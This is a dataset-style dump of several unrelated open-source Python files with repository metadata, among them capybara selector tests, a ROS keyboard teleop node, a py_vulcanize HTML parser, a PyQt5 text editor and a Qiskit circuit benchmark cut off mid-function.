] | permissive | elliterate/capybara.py | b846f3cb1a712a120361849b378d437775c2c6db | eafd9ac50d02e8b57ef90d767493c8fa2be0739a | refs/heads/master | 2023-08-16T13:56:51.506840 | 2022-01-16T18:04:22 | 2022-01-16T18:04:22 | 64,620,050 | 63 | 22 | MIT | 2022-01-16T18:04:23 | 2016-07-31T23:02:18 | Python | UTF-8 | Python | false | false | 3,002 | py | import pytest
import capybara
class MatchesSelectorTestCase:
    # Shared fixtures: every test starts on /with_html, and most operate on
    # the span whose text is "42".

    @pytest.fixture(autouse=True)
    def setup_session(self, session):
        session.visit("/with_html")

    @pytest.fixture
    def element(self, session):
        return session.find("//span", text="42")
class TestMatchesSelector(MatchesSelectorTestCase):
    # Element.matches_selector: true iff the element matches the given
    # selector (and any text filter).

    def test_is_true_if_the_element_matches_the_given_selector(self, element):
        assert element.matches_selector("xpath", "//span") is True
        assert element.matches_selector("css", "span.number") is True

    def test_is_false_if_the_element_does_not_match_the_given_selector(self, element):
        assert element.matches_selector("xpath", "//div") is False
        assert element.matches_selector("css", "span.not_a_number") is False

    def test_uses_default_selector(self, element):
        # With no explicit selector kind, capybara.default_selector applies.
        capybara.default_selector = "css"
        assert not element.matches_selector("span.not_a_number")
        assert element.matches_selector("span.number")

    def test_works_with_elements_located_via_a_sibling_selector(self, element):
        sibling = element.sibling("css", "span", text="Other span")
        assert sibling.matches_selector("xpath", "//span")
        assert sibling.matches_selector("css", "span")

    def test_works_with_the_html_element(self, session):
        html = session.find("/html")
        assert html.matches_selector("css", "html")

    def test_discards_all_matches_where_the_given_string_is_not_contained(self, element):
        assert element.matches_selector("//span", text="42")
        assert not element.matches_selector("//span", text="Doesnotexist")
class TestNotMatchSelector(MatchesSelectorTestCase):
    """Element.not_match_selector is the negation of matches_selector and
    mirrors each of its cases."""

    def test_is_false_if_the_element_matches_the_given_selector(self, element):
        assert element.not_match_selector("xpath", "//span") is False
        assert element.not_match_selector("css", "span.number") is False

    def test_is_true_if_the_element_does_not_match_the_given_selector(self, element):
        assert element.not_match_selector("xpath", "//div") is True
        assert element.not_match_selector("css", "span.not_a_number") is True

    def test_uses_default_selector(self, element):
        # With no explicit kind, the global default selector is used.
        capybara.default_selector = "css"
        assert element.not_match_selector("span.not_a_number")
        assert not element.not_match_selector("span.number")

    def test_works_with_elements_located_via_a_sibling_selector(self, element):
        sibling = element.sibling("css", "span", text="Other span")
        assert not sibling.not_match_selector("xpath", "//span")
        assert sibling.not_match_selector("css", "div")

    def test_works_with_the_html_element(self, session):
        html = session.find("/html")
        assert html.not_match_selector("css", "body")

    def test_discards_all_matches_where_the_given_string_is_contained(self, element):
        assert not element.not_match_selector("//span", text="42")
        assert element.not_match_selector("//span", text="Doesnotexist")
| [
"[email protected]"
] | |
e7d128e1500aba2f7670ba59a46061cdec915f47 | 069d2985895eefe33454e57ff2d85b9fa8aa7fa0 | /run.py | df4f5781aa2fc97d2b52b3f42b8ed9f9d8363f45 | [] | no_license | KIRA009/formbuilder | 8a6dd2949b42560f3b7cbad4b2c00e32e09ff55f | 880fdbe211d80c31870dd8da84e376de9598b738 | refs/heads/master | 2023-02-05T16:42:08.806984 | 2019-07-02T18:34:05 | 2019-07-02T18:34:05 | 194,048,846 | 1 | 1 | null | 2023-02-02T06:32:31 | 2019-06-27T07:52:40 | JavaScript | UTF-8 | Python | false | false | 253 | py | from app_builder import build_app
import os
ROOT_DIR = os.getcwd()
app, db, migrate, login_manager = build_app(app_name=__name__, env_path=ROOT_DIR + '\.env', config_env='SETTINGS')
from myapp.views import *
if __name__ == '__main__':
app.run()
| [
"[email protected]"
] | |
413ca2abc71b33a69400411278b07e243fbf15a8 | e4910c4b436223859d91f3569cadafa69a3c777b | /src/racecar/scripts/keyboard.py | c8c26dd85a147588db69800067b55328e93f0960 | [
"BSD-3-Clause"
] | permissive | pmusau17/F1TenthHardware | 81ae6870e15c1fe39a1f386b8bcfaa653bf2675c | 3ae3ab1cedd89e56db2fbabe24f1c6a79d3553d9 | refs/heads/master | 2023-04-01T09:02:12.635614 | 2021-04-07T16:34:17 | 2021-04-07T16:34:17 | 298,356,593 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,059 | py | #!/usr/bin/env python
import rospy
from racecar.msg import drive_param
from ackermann_msgs.msg import AckermannDriveStamped
import sys, select, termios, tty
# WASD key -> (throttle direction, steering direction).
# Throttle: +1 forward / -1 reverse; steering: +1 left / -1 right.
keyBindings = {
    'w': (1, 0),
    'd': (1, -1),
    'a': (1, 1),
    's': (-1, 0),
}
def getKey():
    # Read a single keypress from stdin without waiting for Enter.
    # NOTE(review): relies on the module-level `settings` captured in the
    # __main__ block to restore the terminal to cooked mode afterwards.
    tty.setraw(sys.stdin.fileno())
    select.select([sys.stdin], [], [], 0)
    key = sys.stdin.read(1)
    termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
    return key
speed = 0.7  # scale applied to the throttle direction
turn = 0.5   # scale applied to the steering direction

if __name__=="__main__":
    # Remember terminal settings so getKey() can restore cooked mode.
    settings = termios.tcgetattr(sys.stdin)
    rospy.init_node('keyboard', anonymous=True)

    # Optional single argument: racecar namespace prefix for the topic.
    args = rospy.myargv()[1:]
    if(len(args)==1):
        racecar_name = args[0]
    else:
        racecar_name = ''

    pub = rospy.Publisher(racecar_name+'/ackermann_cmd_mux/input/teleop', AckermannDriveStamped, queue_size=10)

    x = 0
    th = 0
    status = 0

    try:
        while(1):
            key = getKey()
            if key in keyBindings.keys():
                x = keyBindings[key][0]
                th = keyBindings[key][1]
            else:
                # Any unmapped key stops the car.
                x = 0
                th = 0

            if (key == '\x03'):  # Ctrl-C ends the teleop loop
                break

            # NOTE(review): this drive_param message is built and logged but
            # is immediately replaced by the AckermannDriveStamped below.
            msg = drive_param()
            msg.velocity = x*speed
            msg.angle = th*turn
            rospy.loginfo(str(msg.velocity))
            rospy.loginfo(str(msg.angle))
            print(x*speed,th*turn)

            msg = AckermannDriveStamped();
            msg.header.stamp = rospy.Time.now();
            msg.header.frame_id = "base_link";
            msg.drive.speed = x*speed
            msg.drive.acceleration = 1
            msg.drive.jerk = 1
            msg.drive.steering_angle = th*turn
            msg.drive.steering_angle_velocity = 1
            pub.publish(msg)

    except:
        # Python 2 file; bare except keeps the teleop from crashing the node.
        print 'error'

    finally:
        # Publish one final command and restore the terminal afterwards.
        msg = drive_param()
        msg.velocity = 0
        msg.angle = 0

        msg = AckermannDriveStamped();
        msg.header.stamp = rospy.Time.now();
        msg.header.frame_id = "base_link";
        msg.drive.speed = x*speed
        msg.drive.acceleration = 1
        msg.drive.jerk = 1
        msg.drive.steering_angle = th*turn
        msg.drive.steering_angle_velocity = 1
        pub.publish(msg)

    termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
| [
"[email protected]"
] | |
06c5cd504516c90e7f07c7a903062d100667cc1e | 600df3590cce1fe49b9a96e9ca5b5242884a2a70 | /third_party/catapult/third_party/py_vulcanize/py_vulcanize/parse_html_deps.py | 6fbe31daac48d0626acb4efdd44a3050c975ead4 | [
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | permissive | metux/chromium-suckless | efd087ba4f4070a6caac5bfbfb0f7a4e2f3c438a | 72a05af97787001756bae2511b7985e61498c965 | refs/heads/orig | 2022-12-04T23:53:58.681218 | 2017-04-30T10:59:06 | 2017-04-30T23:35:58 | 89,884,931 | 5 | 3 | BSD-3-Clause | 2022-11-23T20:52:53 | 2017-05-01T00:09:08 | null | UTF-8 | Python | false | false | 5,738 | py | # Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import sys
from py_vulcanize import module
from py_vulcanize import strip_js_comments
from py_vulcanize import html_generation_controller
def _AddToPathIfNeeded(path):
if path not in sys.path:
sys.path.insert(0, path)
def _InitBeautifulSoup():
  """Make catapult's vendored beautifulsoup4/html5lib/six importable.

  Prepends the vendored checkout locations to sys.path so the `import bs4`
  below resolves to the bundled copies rather than any system-wide install.
  """
  catapult_path = os.path.abspath(
      os.path.join(os.path.dirname(__file__),
                   os.path.pardir, os.path.pardir, os.path.pardir))

  bs_path = os.path.join(catapult_path, 'third_party', 'beautifulsoup4')
  _AddToPathIfNeeded(bs_path)

  html5lib_path = os.path.join(catapult_path, 'third_party', 'html5lib-python')
  _AddToPathIfNeeded(html5lib_path)

  six_path = os.path.join(catapult_path, 'third_party', 'six')
  _AddToPathIfNeeded(six_path)

# Run at import time so the bs4 import below succeeds.
_InitBeautifulSoup()
import bs4
class InlineScript(object):
  """Wraps an inline <script> node, exposing its source and enclosing tags."""

  def __init__(self, soup):
    if not soup:
      raise module.DepsException('InlineScript created without soup')
    self._soup = soup
    self._stripped_contents = None  # lazily computed comment-stripped JS
    self._open_tags = None          # lazily computed ancestor-tag chain

  @property
  def contents(self):
    return unicode(self._soup.string)

  @property
  def stripped_contents(self):
    """The script source with JavaScript comments removed (cached)."""
    if not self._stripped_contents:
      self._stripped_contents = strip_js_comments.StripJSComments(
          self.contents)
    return self._stripped_contents

  @property
  def open_tags(self):
    """Ancestor tags enclosing this script, outermost first.

    The trailing <script> tag itself is dropped from the chain.
    """
    if self._open_tags:
      return self._open_tags
    open_tags = []
    cur = self._soup.parent
    while cur:
      if isinstance(cur, bs4.BeautifulSoup):
        break  # reached the document root
      open_tags.append(_Tag(cur.name, cur.attrs))
      cur = cur.parent
    open_tags.reverse()
    assert open_tags[-1].tag == 'script'
    del open_tags[-1]
    self._open_tags = open_tags
    return self._open_tags
def _CreateSoupWithoutHeadOrBody(html):
  """Re-parse |html| and return a soup containing only the children of
  <head> and <body>, without the wrapper elements html5lib inserts."""
  soupCopy = bs4.BeautifulSoup(html, 'html5lib')
  soup = bs4.BeautifulSoup()
  soup.reset()
  if soupCopy.head:
    for n in soupCopy.head.contents:
      n.extract()  # detach from the old tree before re-appending
      soup.append(n)
  if soupCopy.body:
    for n in soupCopy.body.contents:
      n.extract()
      soup.append(n)
  return soup
class HTMLModuleParserResults(object):
  """Lazy accessors over a parsed HTML module: scripts, imports, styles, and
  a generator of the remaining inlinable HTML."""

  def __init__(self, html):
    self._soup = bs4.BeautifulSoup(html, 'html5lib')
    self._inline_scripts = None  # cache for the inline_scripts property

  @property
  def scripts_external(self):
    """The src URLs of all <script src=...> tags."""
    tags = self._soup.findAll('script', src=True)
    return [t['src'] for t in tags]

  @property
  def inline_scripts(self):
    """InlineScript wrappers for all <script> tags without a src (cached)."""
    if not self._inline_scripts:
      tags = self._soup.findAll('script', src=None)
      self._inline_scripts = [InlineScript(t.string) for t in tags]
    return self._inline_scripts

  @property
  def imports(self):
    """The href values of all <link rel="import"> tags."""
    tags = self._soup.findAll('link', rel='import')
    return [t['href'] for t in tags]

  @property
  def stylesheets(self):
    """The href values of all <link rel="stylesheet"> tags."""
    tags = self._soup.findAll('link', rel='stylesheet')
    return [t['href'] for t in tags]

  @property
  def inline_stylesheets(self):
    """The text contents of all <style> tags."""
    tags = self._soup.findAll('style')
    return [unicode(t.string) for t in tags]

  def YieldHTMLInPieces(self, controller, minify=False):
    yield self.GenerateHTML(controller, minify)

  def GenerateHTML(self, controller, minify=False, prettify=False):
    """Return this module's HTML with imports/scripts stripped and styles
    rewritten via |controller|, optionally minified or prettified."""
    soup = _CreateSoupWithoutHeadOrBody(unicode(self._soup))

    # Remove the DOCTYPE declaration, if any.
    for x in soup.contents:
      if isinstance(x, bs4.Doctype):
        x.extract()

    # Remove any XML declaration.
    for x in soup.contents:
      if isinstance(x, bs4.Declaration):
        x.extract()

    # Remove all imports.
    imports = soup.findAll('link', rel='import')
    for imp in imports:
      imp.extract()

    # Remove all script links.
    scripts_external = soup.findAll('script', src=True)
    for script in scripts_external:
      script.extract()

    # Remove all in-line scripts.
    scripts_external = soup.findAll('script', src=None)
    for script in scripts_external:
      script.extract()

    # Process all in-line styles: the controller may rewrite or drop them.
    inline_styles = soup.findAll('style')
    for style in inline_styles:
      html = controller.GetHTMLForInlineStylesheet(unicode(style.string))
      if html:
        ns = soup.new_tag('style')
        ns.append(bs4.NavigableString(html))
        style.replaceWith(ns)
      else:
        style.extract()

    # Rewrite all external stylesheet hrefs or remove, as needed.
    stylesheet_links = soup.findAll('link', rel='stylesheet')
    for stylesheet_link in stylesheet_links:
      html = controller.GetHTMLForStylesheetHRef(stylesheet_link['href'])
      if html:
        tmp = bs4.BeautifulSoup(html, 'html5lib').findAll('style')
        assert len(tmp) == 1
        stylesheet_link.replaceWith(tmp[0])
      else:
        stylesheet_link.extract()

    # Remove comments if minifying.
    if minify:
      comments = soup.findAll(
          text=lambda text: isinstance(text, bs4.Comment))
      for comment in comments:
        comment.extract()
    if prettify:
      return soup.prettify('utf-8').strip()

    # We are done.
    return unicode(soup).strip()

  @property
  def html_contents_without_links_and_script(self):
    return self.GenerateHTML(
        html_generation_controller.HTMLGenerationController())
class _Tag(object):
def __init__(self, tag, attrs):
self.tag = tag
self.attrs = attrs
def __repr__(self):
attr_string = ' '.join('%s="%s"' % (x[0], x[1]) for x in self.attrs)
return '<%s %s>' % (self.tag, attr_string)
class HTMLModuleParser():
  """Entry point: parses raw HTML module text into HTMLModuleParserResults."""

  def Parse(self, html):
    """Parse |html| (None is treated as empty) into parser results.

    Raises if the text contains an unescaped closing script tag, which
    would break later re-serialization.
    """
    if html is None:
      return HTMLModuleParserResults('')
    if '< /script>' in html:
      raise Exception('Escape script tags with <\/script>')
    return HTMLModuleParserResults(html)
| [
"[email protected]"
] | |
1132547772e06d6b2ee93fee62cd3605b759ec0c | 60a831fb3c92a9d2a2b52ff7f5a0f665d4692a24 | /IronPythonStubs/release/stubs.min/Autodesk/Revit/DB/__init___parts/BindingMap.py | 686d18be3c7071d131cd785f06980c6c9a4a0c07 | [
"MIT"
] | permissive | shnlmn/Rhino-Grasshopper-Scripts | a9411098c5d1bbc55feb782def565d535b27b709 | 0e43c3c1d09fb12cdbd86a3c4e2ba49982e0f823 | refs/heads/master | 2020-04-10T18:59:43.518140 | 2020-04-08T02:49:07 | 2020-04-08T02:49:07 | 161,219,695 | 11 | 2 | null | null | null | null | UTF-8 | Python | false | false | 4,051 | py | class BindingMap(DefinitionBindingMap,IDisposable,IEnumerable):
"""
The parameters BindingMap contains all the parameter bindings that exist in the
Autodesk Revit project.
"""
def Clear(self):
"""
Clear(self: BindingMap)
This method is used to remove all the items in the map.
"""
pass
def Contains(self,key):
"""
Contains(self: BindingMap,key: Definition) -> bool
The Contains method is used to check if the parameter binding exists for one
definition.
key: A parameter definition which can be an existing definition or one from a shared
parameters file.
"""
pass
def Dispose(self):
""" Dispose(self: BindingMap,A_0: bool) """
pass
def Erase(self,key):
"""
Erase(self: BindingMap,key: Definition) -> int
This method is used to erase one item in the map.
"""
pass
def Insert(self,key,item,parameterGroup=None):
"""
Insert(self: BindingMap,key: Definition,item: Binding) -> bool
Creates a new parameter binding between a parameter and a set of categories.
key: A parameter definition which can be an existing definition or one from a shared
parameters file.
item: An InstanceBinding or TypeBinding object which contains the set of categories
to which the parameter should be bound.
Insert(self: BindingMap,key: Definition,item: Binding,parameterGroup: BuiltInParameterGroup) -> bool
Creates a new parameter binding between a parameter and a set of categories in
a specified group.
key: A parameter definition which can be an existing definition or one from a shared
parameters file.
item: An InstanceBinding or TypeBinding object which contains the set of categories
to which the parameter should be bound.
parameterGroup: The GroupID of the parameter definition.
"""
pass
def ReInsert(self,key,item,parameterGroup=None):
"""
ReInsert(self: BindingMap,key: Definition,item: Binding) -> bool
Removes an existing parameter and creates a new binding for a given parameter.
key: A parameter definition which can be an existing definition or one from a shared
parameters file.
item: An InstanceBinding or TypeBinding object which contains the set of categories
to which the parameter should be bound.
ReInsert(self: BindingMap,key: Definition,item: Binding,parameterGroup: BuiltInParameterGroup) -> bool
Removes an existing parameter and creates a new binding for a given parameter
in a specified group.
key: A parameter definition which can be an existing definition or one from a shared
parameters file.
item: An InstanceBinding or TypeBinding object which contains the set of categories
to which the parameter should be bound.
parameterGroup: The GroupID of the parameter definition.
"""
pass
def ReleaseManagedResources(self,*args):
""" ReleaseManagedResources(self: APIObject) """
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: APIObject) """
pass
def Remove(self,key):
"""
Remove(self: BindingMap,key: Definition) -> bool
The Remove method is used to remove a parameter binding.
key: A parameter definition which can be an existing definition or one from a shared
parameters file.
"""
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __getitem__(self,*args):
""" x.__getitem__(y) <==> x[y] """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self,*args):
""" __iter__(self: IEnumerable) -> object """
pass
def __setitem__(self,*args):
""" x.__setitem__(i,y) <==> x[i]= """
pass
| [
"[email protected]"
] | |
45ae02db652e3be0161f27e1c06dc8c4cd2cc2e5 | 11398875e4f5cbcadc1747e73049dc99bca26908 | /06-time/time-01.py | 7f952d5930c3c2ef4b13a8eec60178b112e90857 | [] | no_license | asvkarthick/LearnPython | 37910faab5c4a18d6e08eb304ca1da9649e5b18f | 258e8c567ca3c8802d5e56f20b34317eba4c75f3 | refs/heads/master | 2021-06-23T06:30:46.681369 | 2021-06-11T19:35:40 | 2021-06-11T19:35:40 | 149,719,196 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 143 | py | #!/usr/bin/python
# Author: Karthick Kumaran <[email protected]>
import time
print('Sleeping for 2 seconds')
time.sleep(2)
print('Done')
| [
"[email protected]"
] | |
83774ee8ba86d36addb91c1a11753509b4785fd5 | 16a2ac198a36d7633c62d41f4604356cd0ae732e | /Au-public-master/iron/utilities/rename_to_pacbio.py | 7b73810b42d4d374c9af78099e87739af78271c2 | [
"Apache-2.0"
] | permissive | Dingjie-Wang/Manual-for-running-IDP-pipeline | f433ba5b0dbd44da5a9d8836b3e29a27e12a48c4 | 6c2756e10184f0b8f0e5872a358378e90f1729b0 | refs/heads/master | 2021-06-29T04:02:56.741203 | 2020-12-07T17:39:05 | 2020-12-07T17:39:05 | 201,325,604 | 1 | 7 | null | null | null | null | UTF-8 | Python | false | false | 1,878 | py | #!/usr/bin/python
import sys,argparse
from SequenceBasics import FastaHandleReader, FastqHandleReader
def main():
    """Rename reads to PacBio-style names (m.../<serial>/ccs).

    Reads FASTA/FASTQ/GPD from `input` ('-' for STDIN), writes renamed
    records to `-o/--output` (default STDOUT) and, optionally, an
    original-name -> new-name table to `--output_table`.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('input', help="Use - for STDIN")
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument('--fasta', action='store_true')
    group.add_argument('--fastq', action='store_true')
    group.add_argument('--gpd', action='store_true')
    parser.add_argument('--output_table', help='save coversion to file')
    parser.add_argument('-o', '--output')
    args = parser.parse_args()
    if args.input == '-':
        args.input = sys.stdin
    else:
        args.input = open(args.input)
    # BUGFIX: the stdout fallback used to hang off the --output_table check,
    # so giving -o without --output_table silently redirected all output to
    # STDOUT instead of the requested file.
    if args.output:
        args.output = open(args.output, 'w')
    else:
        args.output = sys.stdout
    if args.output_table:
        args.output_table = open(args.output_table, 'w')
    if args.gpd:
        # GPD is tab-delimited; rewrite the first two name columns in place.
        z = 0
        for line in args.input:
            f = line.rstrip().split("\t")
            z += 1
            name = 'm150101_010101_11111_c111111111111111111_s1_p0/'+str(z)+'/ccs'
            if args.output_table: args.output_table.write(f[0]+"\t"+name+"\n")
            f[0] = name
            f[1] = name
            args.output.write("\t".join(f)+"\n")
        args.output.close()
        if args.output_table:
            args.output_table.close()
        return
    if args.fasta:
        args.input = FastaHandleReader(args.input)
    elif args.fastq:
        args.input = FastqHandleReader(args.input)
    z = 0
    while True:
        e = args.input.read_entry()
        if not e: break
        z += 1
        name = 'm150101_010101_11111_c111111111111111111_s1_p0/'+str(z)+'/ccs'
        if args.fastq:
            args.output.write('@'+name+"\n"+e['seq']+"\n"+'+'+e['qual']+"\n")
        elif args.fasta:
            args.output.write('>'+name+"\n"+e['seq']+"\n")
        if args.output_table: args.output_table.write(e['name']+"\t"+name+"\n")
    args.output.close()
    if args.output_table: args.output_table.close()

if __name__=="__main__":
    main()
| [
"[email protected]"
] | |
fdc482ebab30deb95941025999cd0e9ef8238969 | b6cf41b1eadb6571e30998712da651ec62db07ad | /Gui/TextEdit.py | ceb67896e0bb84b333873a5b082f3dbedb16f3f7 | [] | no_license | fdanesse/CoralEditor | 8d1949ff86af61d44d573d544a3b76dbc182b5d4 | e42239f75ee921c99d13e60758b32ca5862c303f | refs/heads/master | 2021-08-14T07:14:19.203753 | 2017-11-15T00:06:11 | 2017-11-15T00:06:11 | 107,883,737 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,380 | py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
from PyQt5.QtCore import Qt
from PyQt5.QtCore import QEvent
from PyQt5.QtWidgets import QPlainTextEdit
from PyQt5.QtWidgets import QApplication
from PyQt5.QtGui import QPalette
from PyQt5.QtGui import QColor
from PyQt5.QtGui import QFont
from PyQt5.QtGui import QFontMetrics
from PyQt5.QtGui import QTextCharFormat
from PyQt5.QtGui import QKeyEvent
#from PyQt5.QtGui import QTextCursor
#from Gui.Syntax.PythonHighlighter import PythonHighlighter
class TextEdit(QPlainTextEdit):
    """Plain-text code editor widget: monospace font, dark palette, Tab
    expanded to four spaces, and whitespace clean-up on load."""
    # https://doc.qt.io/qt-5/qplaintextedit.html
    # https://github.com/hugoruscitti/pilas/blob/e33bfd80a9c9faec432dbd3de1d82066b8704303/pilasengine/interprete/editorbase/editor_base.py
    # http://www.binpress.com/tutorial/developing-a-pyqt-text-editor-part-2/145
    # http://ftp.ics.uci.edu/pub/centos0/ics-custom-build/BUILD/PyQt-x11-gpl-4.7.2/doc/html/qtextedit.html
    # http://nullege.com/codes/show/src@p@y@pyqt5-HEAD@examples@tools@[email protected]/92/PyQt5.QtWidgets.QTextEdit.textCursor
    # http://nullege.com/codes/show/src@p@y@pyqt5-HEAD@examples@richtext@[email protected]/87/PyQt5.QtWidgets.QTextEdit.setFocus

    # Ejemplos:
    # https://stackoverflow.com/questions/31610351/qplaintextedit-thinks-its-modified-if-it-has-an-empty-text
    # https://john.nachtimwald.com/2009/08/19/better-qplaintextedit-with-line-numbers/
    # https://github.com/Werkov/PyQt4/blob/master/examples/demos/textedit/textedit.py

    def __init__(self, parent, path=""):
        """Create the editor; if `path` exists its contents are loaded
        (after whitespace clean-up), otherwise a Python 3 header is seeded."""
        #super().__init__()
        super(TextEdit, self).__init__(parent)

        self.parent = parent
        self.path = path

        # Monospace font configured explicitly, property by property.
        font = QFont("Monospace", 8) #QFont()
        #font.setFamily("Monospace")
        font.setStyleHint(QFont.Monospace)
        font.setStyle(QFont.StyleNormal)
        font.setStyleStrategy(QFont.PreferDefault)
        font.setWeight(QFont.ExtraLight)
        font.setCapitalization(QFont.MixedCase)
        font.setHintingPreference(QFont.PreferDefaultHinting)
        font.setLetterSpacing(QFont.PercentageSpacing, 100.0)
        font.setStretch(QFont.AnyStretch)

        font.setBold(False)
        font.setFixedPitch(True)
        font.setItalic(False)
        font.setKerning(True)
        font.setOverline(False)  # overline
        #font.setPixelSize(8) #font.setPointSize(8) font.setPointSizeF(8)
        font.setStrikeOut(False)  # strikethrough
        #font.setStyleName()
        font.setUnderline(False)
        #font.setWordSpacing(1)

        print(font.toString())
        charFormat = QTextCharFormat()
        charFormat.setFont(font)

        #self.setTabStopWidth(4)
        self.setCursorWidth(5)
        self.setCurrentCharFormat(charFormat)
        #print(self.document().defaultTextOption())

        #FIXME: switch this hard-coded palette to qss (Qt style sheets)
        pal = QPalette()
        bgc = QColor(39, 40, 34)     # dark background
        pal.setColor(QPalette.Base, bgc)
        textc = QColor(255, 255, 255)  # white text
        pal.setColor(QPalette.Text, textc)
        self.setPalette(pal)

        self.setLineWrapMode(QPlainTextEdit.NoWrap)
        #self.setTextBackgroundColor(QColor(0, 255, 255))
        #self.setTextColor(QColor(0, 255, 255))
        #self.setFontWeight(QFont.Normal)

        #cursor = self.textCursor()
        #cursor.movePosition(QTextCursor.End)

        #self.setDocumentTitle("Coso")

        #self.syntaxHighlighter = PythonHighlighter(self.document())

        # Signals
        #self.blockCountChanged.connect(self.__newBlock)
        #self.cursorPositionChanged.connect()
        #self.selectionChanged.connect(self.__changedSelection)
        #self.textChanged.connect(self.__changedText)
        #self.updateRequest.connect((const QRect &rect, int dy)
        #self.modificationChanged.connect(self.__chanedModification)
        #self.copyAvailable.connect(self.__copyAvailable)
        #self.undoAvailable.connect(self.__undoAvailable)
        #self.redoAvailable.connect(self.__redoAvailable)

        if os.path.exists(self.path):
            # Load and normalize the file; the document counts as modified
            # only if the clean-up actually changed something.
            file = open(self.path, 'r')
            data = file.read()
            texto = self.__limpiar_codigo(data)
            self.setPlainText(texto)
            self.document().setModified(data != texto)

            if data != texto:
                print("El texto fue corregido al abrir el archivo.")
        else:
            self.setPlainText("#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n")
            self.document().setModified(True)

        self.setFocus()

    def getStatus(self):
        """
        If the text has been modified, it can be saved.
        """
        return{
            "modified": self.document().isModified(),
            }

    #def __chanedModification(self, changed):
    #    pass
    #    #print("Document changed:", changed)

    #def __changedSelection(self):
    #    cursor = self.textCursor()
    #    selected = cursor.selectionEnd()-cursor.selectionStart()
    #    self.canSelectAll = selected < len(self.toPlainText())

    #def __copyAvailable(self, available):
    #    self.canCopy = available

    #def __undoAvailable(self, available):
    #    pass
    #    #print("Undo:", available)

    #def __redoAvailable(self, available):
    #    pass
    #    #print("Redo:", available)

    def keyPressEvent(self, event):
        """Intercept Tab and replay it as four Space key events."""
        # https://doc.qt.io/qt-5/qt.html#Key-enum
        if event.key() == Qt.Key_Tab:
            event.ignore()
            event.accept = True
            for x in range(0, 4):
                newevent = QKeyEvent(QEvent.KeyPress, Qt.Key_Space,
                    Qt.NoModifier, text=" ", autorep=False, count=1)
                QApplication.postEvent(self, newevent)
        else:
            super(TextEdit, self).keyPressEvent(event)
            event.accept = True

        self.setFocus()

    '''
    def __newBlock(self, newBlockCount):
        #print(newBlockCount)

    def __changedText(self):
        text = self.document().toPlainText()
        text = self.__limpiar_codigo(text)
        #self.setPlainText(text)
        print(text, self.document().size())
    '''

    def __limpiar_codigo(self, texto):
        # Normalize each line: strip trailing whitespace, force a newline,
        # and replace tabs.  NOTE(review): the character-by-character
        # accumulation below is O(n^2); "".join over lines would be linear.
        limpio = ""
        for line in texto.splitlines():
            text_line = "%s\n" % (line.rstrip())
            ret = text_line.replace("\t", " ")
            for l in ret:
                limpio = "%s%s" % (limpio, l)
        return limpio
"[email protected]"
] | |
2cbcad6a307bd6d1b5101f9e5781d7caaa236d91 | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startQiskit_QC1087.py | 70d9c4bc57bcaa206e68809763018b4b54d22d38 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,454 | py | # qubit number=5
# total number=50
import cirq
import qiskit
from qiskit import IBMQ
from qiskit.providers.ibmq import least_busy
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
    """Build the phase oracle O_f^± for a boolean function f on n-bit strings.

    For every bitstring on which f returns "1", the corresponding basis
    state's phase is flipped by X-conjugating a multi-controlled phase gate
    (mcu1(pi)) so that it fires on exactly that pattern.
    """
    # implement the oracle O_f^\pm
    # NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate
    # or multi_control_Z_gate (issue #127)
    controls = QuantumRegister(n, "ofc")
    oracle = QuantumCircuit(controls, name="Zf")

    for i in range(2 ** n):
        rep = np.binary_repr(i, n)  # bitstring of basis state |i>
        if f(rep) == "1":
            # Map |rep> onto |11...1> so the controlled phase targets it.
            for j in range(n):
                if rep[j] == "0":
                    oracle.x(controls[j])

            # oracle.h(controls[n])
            if n >= 2:
                oracle.mcu1(pi, controls[1:], controls[0])

            # Undo the X conjugation.
            for j in range(n):
                if rep[j] == "0":
                    oracle.x(controls[j])
    # oracle.barrier()
    return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
    """Build the auto-generated Grover-style benchmark circuit on n qubits.

    Applies a Hadamard layer, then floor(sqrt(2^n)*pi/4) rounds of the Zf
    oracle followed by a fixed generator-produced gate sequence, and finally
    measures every qubit.  The `# number=k` comments are gate ids emitted by
    the circuit generator and are kept for traceability.
    """
    # circuit begin
    input_qubit = QuantumRegister(n,"qc")
    classical = ClassicalRegister(n, "qm")
    prog = QuantumCircuit(input_qubit, classical)
    prog.h(input_qubit[0]) # number=3
    prog.h(input_qubit[1]) # number=4
    prog.h(input_qubit[2]) # number=5
    prog.h(input_qubit[3]) # number=6
    prog.h(input_qubit[4]) # number=21
    Zf = build_oracle(n, f)

    repeat = floor(sqrt(2 ** n) * pi / 4)
    for i in range(repeat):
        prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)])
